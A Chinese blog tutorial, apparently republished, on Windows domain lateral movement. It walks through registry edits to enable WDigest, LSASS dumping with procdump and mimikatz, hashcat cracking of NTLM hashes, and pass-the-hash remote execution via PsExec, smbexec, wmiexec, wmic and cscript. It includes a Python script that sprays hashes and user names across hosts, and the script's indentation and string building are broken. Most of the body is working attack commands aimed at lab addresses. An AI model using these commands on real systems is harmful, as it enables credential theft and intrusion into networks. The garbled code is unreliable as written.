首页 星云 工具 资源 星选 资讯 热门工具
:

PDF转图片 完全免费 小红书视频下载 无水印 抖音视频下载 无水印 数字星空

8.18域横向smb&wmi明文或hash传递

编程知识
2024年09月05日 22:20

知识点

windows 2012以上版本默认关闭wdigust,攻击者无法从内存中获取明文密码;

Windows2012以下版本如安装KB287199补丁,同样也无法从内存中获取明文密码;

解决方法:

1、利用哈希hash传递(ptl、ptk等)进行移动

2、利用其他服务协议(SMB、WMI等)进行哈希移动

3、利用注册表操作开启wdigust、Auth值进行获取

4、利用工具或第三方平台(Hachcat)进行破解

知识点2:

Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。

注册表修改开启Wdigest Auth值

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Procdump(windows官方自带)+Mimikatz配合获取

优点:isass.dump包括一些windows本地策略和账户管理,获取lsass.dmp文件后,可在本地mimikatz解密;
cmd切换盘:cd /d 目标地址

当mimikatz获取失败时配合procdump获取密码

1、生成储存着密码hash值的.dmp文件

procdump -accepteula -ma lsass.exe lsass.dmp
    

2、将dmp文件放到mimikatz上执行

提权:    privilege::debug

记录控制台输入结果:log

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

附两款提取密码的软件

Pwdump7

QuarksPwdump

Hashcat工具破解获取Windows NTML Hash


    hashcat -a 0 -m 1000 hash file --force

该工具还支持更多密码破解 

32ed87bdb5fdc5e9cba88547376818d4

利用SMB服务通过明文hash传递远程执行,条件445服务端口开放即可;

1、psexec第一种(pstool中的PsExec.exe文件):先有ipc链接,psexec需要明文或hash传递

需要先有ipc链接,-s以System权限运行

net use \[IP]\ipc$"[密码]" /user:[用户名]

net use \192.168.79.132\ipc$ lcn#123456 /user:lcn.cn\Administrator #建立tcp连接

PsExec.exe \192.168.79.132 -s cmd
    

2、psexec第二种:不用建立IPC直接提供明文账户密码

PsExec.exe \[IP] -u [用户名] -p [密码] -s cmd

PsExec.exe \192.168.79.132 -u administrator -p lcn#123456 -s cmd

PsExec.exe -hashes :[密码的hash值] ./[用户名]@[IP]

PsExec.exe -hashes :b7f2f7b2491ba316e8cd773f8c2d58df ./administrator@192.168.79.132

PsExec.exe -hashes :$HASH$ ./administrator@10.1.2.3

PsExec.exe -hashes :[密码的hash值] [域名]/[用户名]@[IP]

PsExec.exe -hashes :$HASH$ domain/administrator@10.1.2.3

尝试失败。。

官方Pstools无法采用hash连接,可以使用impacket工具包,操作简单,容易被杀

3smbexec无需先ipc链接明文或hash传递

smbexec [域名]/[用户名]:[密码]@[IP]

smbexec lcn.cn/administrator:lcn#123456@192.168.79.132

smbexec ./[用户名]:[密码]@[IP]

smbexec ./administrator:lcn#123456@192.168.79.132
    
    smbexec -hashes :[密码的hash值] ./[用户名]@[IP]

smbexec -hashes :$HASH$ ./lcn#123456@192.168.79.132
    
    smbexec -hashes :[密码的hash值] [域名]/[用户名]@[IP]
    

smbexec -hashes :$HASH$ lcn.cn/administrator@192.168.79.132

 smbexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df  lcn.cn/administrator@192.168.79.132

使用impacket工具包中的psexec模板同理

psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df  lcn.cn/administrator@192.168.79.132

如何区分本地和域用户

net user :本地用户
net user /domain:域用户;连接域用户需加域名;

域横向移动WMI服务利用-cscript、wmiexec、wmic

WMI(Windows Management Instrumentation)是==通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。==**

**1、自带WMIC明文传递,无回显

wmic /node:[IP] /user:[用户名] /password:[密码] process call create "[命令]"

wmic /node:192.168.79.130 /user:administrator /password:admin@123 process call create "cmd.exe /c ipconfig >C:\1.txt"

(运行cmd,执行ipconfig并将结果输出到C盘下的1.txt中)

2、自带cscript明文传递,有回显,需要下载wmiexec.vbs配合

cscript //nologo wmiexec.vbs /shell [IP] [用户名] [密码]

cscript //nologo wmiexec.vbs /shell 192.168.79.130 administrator admin@123

会反弹一个shell

3、套件impacket wmiexec明文或hash传递,有回显exe版本,可能被杀

wmiexec ./[用户名]:[密码]@[IP] "[命令]"

wmiexec ./administrator:lcn#123456@192.168.79.132 "whoami"

wmiexec [域名]/[用户名]:[密码]@[IP] "[命令]"

wmiexec lcn.cn/administrator:lcn#123456@192.168.79.132 "whoami"

wmiexec -hashes :[密码的hash值] ./[用户名]:[密码]@[IP] "[命令]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.79.130 "whoami"

wmiexec -hashes :[密码的hash值] [域名]/[用户名]:[密码]@[IP] "[命令]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 god/administrator@192.168.3.21 "whoami"

域横向移动以上服务hash批量利用-python编译exe

利用py脚本制作的exe文件批量尝试横向渗透

内网横向渗透攻击思路

通过mimikatz收集明文或hash值的密码,“net user /domain”收集域内的用户名,“for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="”探索域内存活地址

批量扫描,用密码撞库

收集更多密码

重复2、3步
``
 ```
 import os
import time
ips={
'192.168.79.128',
'192.168.79.129',
'192.168.79.130',
'192.168.79.132'
}
users={
'admin',
'Administrator',
'administrator',
'userlu',
'testuser',
'juligan'
}
hashs={
'579da618cfbfa85247acf1f800a280a4',
'b7f2f7b2491ba316e8cd773f8c2d58df'
}
'''
passs={
'admin@123', 'admin!123', 'admin#123', 'lcn#123456'}
'''
for ip in ips:
for user in users:
for hash in hashs:
# wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.3.21 "whoami"
exec="wmiexec -hashes :" +hash +' lcn.cn/' +user+ '@'+ ip + "whoami"
execs = "wmiexec -hashes :" + hash + ' ./administrator' + user + '@' + ip + "whoami"
print('--》'+exec+'《--')
os.system(exec)
time.sleep(1)


### 涉及资源:

Hashcat:https://github.com/hashcat/hashcat

密码破解全能工具:Hashcat密码破解攻略:https://www.freebuf.com/sectool/164507.html

mimikatz:https://github.com/gentilkiwi/mimikatz

impacket:https://github.com/SecureAuthCorp/impacket

impacket-examples-windows:https://gitee.com/RichChigga/impacket-examples-windows

PsTools:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

ProcDump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

wmiexec.vbs:https://github.com/realdeveloperongithub/K8tools/blob/master/wmiexec.vbs

wmiexec.vbs(找了俩):https://gitee.com/mirrors/K8tools/blob/master/wmiexec.vbs

From:https://www.cnblogs.com/lusang/p/18399380
本文地址: http://www.shuzixingkong.net/article/1782
0评论
提交 加载更多评论
其他文章 C#自定义控件—指示灯
C#用户控件之指示灯 在体现通讯状态、运行状态等用一个靓眼的指示灯如何做? 思路(GDI) 外环用笔绘制(Pen),内圆用画刷(SolidBrush); 两个方法(用笔画圆,用画刷填充圆的内部): 绘制边界RectangleF定义的椭圆/圆 DrawEllipse(Pen pen,Rectangle
C#自定义控件—指示灯 C#自定义控件—指示灯 C#自定义控件—指示灯
【漏洞分析】Penpie 攻击事件:重入攻击构造奖励金额
背景信息 2024 年 9月 3日,Penpie 合约遭受重入攻击,攻击者在重入阶段向合约添加流动性来冒充奖励金额,从而获取合约内原有的奖励代币。资产损失高达 2734 万美元。 2024 年 5月,Penpie 平台新增了推出了无需许可的资产池功能,即允许 Pendle 上的用户可以在该平台上自建
【漏洞分析】Penpie 攻击事件:重入攻击构造奖励金额 【漏洞分析】Penpie 攻击事件:重入攻击构造奖励金额 【漏洞分析】Penpie 攻击事件:重入攻击构造奖励金额
逻辑回归模型
核心:线性回归+sigmoid映射。 一、概述 逻辑回归模型(Logistic Regression,LR),由名称上来看,似乎是一个专门用于解决回归问题的模型,事实上,该模型更多地用于解决分类问题,尤其是二分类问题。这并不矛盾,因为逻辑回归直接输出的是一个连续值,我们将其按值的大小进行切分,不足一
逻辑回归模型 逻辑回归模型
Falcon Mamba: 首个高效的无注意力机制 7B 模型
Falcon Mamba 是由阿布扎比的 Technology Innovation Institute (TII) 开发并基于 TII Falcon Mamba 7B License 1.0 的开放获取模型。该模型是开放获取的,所以任何人都可以在 Hugging Face 生态系统中 这里 使用它
Falcon Mamba: 首个高效的无注意力机制 7B 模型 Falcon Mamba: 首个高效的无注意力机制 7B 模型
[python][selenium] Web UI自动化页面切换iframe框架
关联文章:Web UI自动化8种页面元素定位方式 1、切换iframe的方法:switch_to.frame 入参有4种: 1.1、id 1.2、name 1.3、index索引 1.4、iframe元素对象 2、返回主文档(最外层的页面)的方法:switch_to.default_content(
从0认识竞品分析(附实战分析抖音)
什么是竞品分析? 顾名思义,是对竞争对手的产品进行比较分析的过程,一种带有主观性的横向分析过程;通过对多个产品的整体架构、功能、商业模式、产品策略等多维度的横向对比分析,从而获得目的性的结论。那如何分析呢?我们这里按照下面几个点来一一展开:**明确目的,行业分析,确定竞品,确定维度,搜索数据,对比
从0认识竞品分析(附实战分析抖音)
ComfyUI 基础教程(二) —— Stable Diffusion 文生图基础工作流及常用节点介绍
上一篇文章讲解述首次启动 ComfyUI 会自动打开一个最基础的文生图工作流。实际上,后续我们可以通过菜单选项,或者快捷键 ctrl + D来打开这个默认工作流。默认工作流如下: 这是一个最基础的文生图工作流,本文通过对这个工作流的讲解,让大家对 ComfyUI 工作流有一个基本的认识。 一、文生图
ComfyUI 基础教程(二) —— Stable Diffusion 文生图基础工作流及常用节点介绍 ComfyUI 基础教程(二) —— Stable Diffusion 文生图基础工作流及常用节点介绍 ComfyUI 基础教程(二) —— Stable Diffusion 文生图基础工作流及常用节点介绍
推荐一款流量录制回放工具:jvm-sandbox-repeater
在软件开发和测试过程中,我们经常会遇到需要对网络请求进行录制和回放的需求,以便进行调试、测试和分析。为了模拟真实的用户请求,我们通常会使用各种流量录制回放工具来记录并重放网络请求。 其中,jvm-sandbox-repeater 是一款功能强大的流量录制回放工具,可以帮助我们轻松实现对网络请求的录制
推荐一款流量录制回放工具:jvm-sandbox-repeater 推荐一款流量录制回放工具:jvm-sandbox-repeater 推荐一款流量录制回放工具:jvm-sandbox-repeater